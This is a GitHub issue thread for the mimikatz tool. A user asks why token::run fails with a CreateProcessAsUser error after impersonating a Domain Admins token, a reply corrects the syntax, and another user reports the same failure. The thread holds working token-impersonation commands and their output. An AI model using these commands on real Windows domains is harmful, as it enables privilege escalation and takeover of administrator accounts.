search

gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.38k stars 3.72k forks source link

Error on token::run #193

Open cclements opened 5 years ago

cclements commented 5 years ago

Hello, hoping someone might be able to help with this. When running mimikatz 2.1.1-20181209 on Server 2008 R2 I get the following issue when attempting to start a process with token::run:

mimikatz # token::elevate /domainadmin
Token Id  : 0
User name : 
SID name  : DOMAIN\Domain Admins

652 {0;009a60cf} 2 F 10117950   DOMAIN\ADMIN    S-1-5-21-645688707-566446853-852869313-3165 (47g,23p)   Impersonation (Impersonation)
 -> Impersonated !
 * Process Token : {0;03d0af9b} 6 F 72918097    DOMAIN\SVC_ACCT S-1-5-21-645688707-566446853-852869313-3172 (16g,23p)   Primary
 * Thread Token  : {0;009a60cf} 2 F 73608752    DOMAIN\ADMIN    S-1-5-21-645688707-566446853-852869313-3165 (47g,23p)   Impersonation (Impersonation)

mimikatz # token::whoami
 * Process Token : {0;03d0af9b} 6 F 72918097    DOMAIN\SVC_ACCT S-1-5-21-645688707-566446853-852869313-3172 (16g,23p)   Primary
 * Thread Token  : {0;009a60cf} 2 F 73608752    DOMAIN\ADMIN    S-1-5-21-645688707-566446853-852869313-3165 (47g,23p)   Impersonation (Impersonation)

mimikatz # token::run cmd.exe
Token Id  : 0
User name : 
SID name  : 

2464    {0;0002ad6c} 0 D 176928     DOMAIN\SVC_ACCT S-1-5-21-645688707-566446853-852869313-3172 (16g,23p)   Primary
ERROR kull_m_process_run_data ; CreateProcessAsUser (0x00000522)
6632    {0;0002ad6c} 0 D 15628551   DOMAIN\SVC_ACCT S-1-5-21-645688707-566446853-852869313-3172 (16g,23p)   Primary
ERROR kull_m_process_run_data ; CreateProcessAsUser (0x00000522)
4592    {0;03d0af9b} 6 F 64150326   DOMAIN\SVC_ACCT S-1-5-21-645688707-566446853-852869313-3172 (16g,23p)   Primary
DOMAIN\SVC_ACCT
Lz1y commented 4 years ago

You should: token::run /process:cmd.exe https://github.com/gentilkiwi/mimikatz/blob/fa42ed93aa4d5aa73825295e2ab757ac96005581/mimikatz/modules/kuhl_m_token.c#L72

mmotwicki commented 11 months ago

Same problem, have an elevated console to nt/authority system with both privileges 

privilege::name SeIncreaseQuotaPrivilege
privilege::name SeAssignPrimaryTokenPrivilege

and still somehow I don't have "privileges" to perform simple things like spawning shell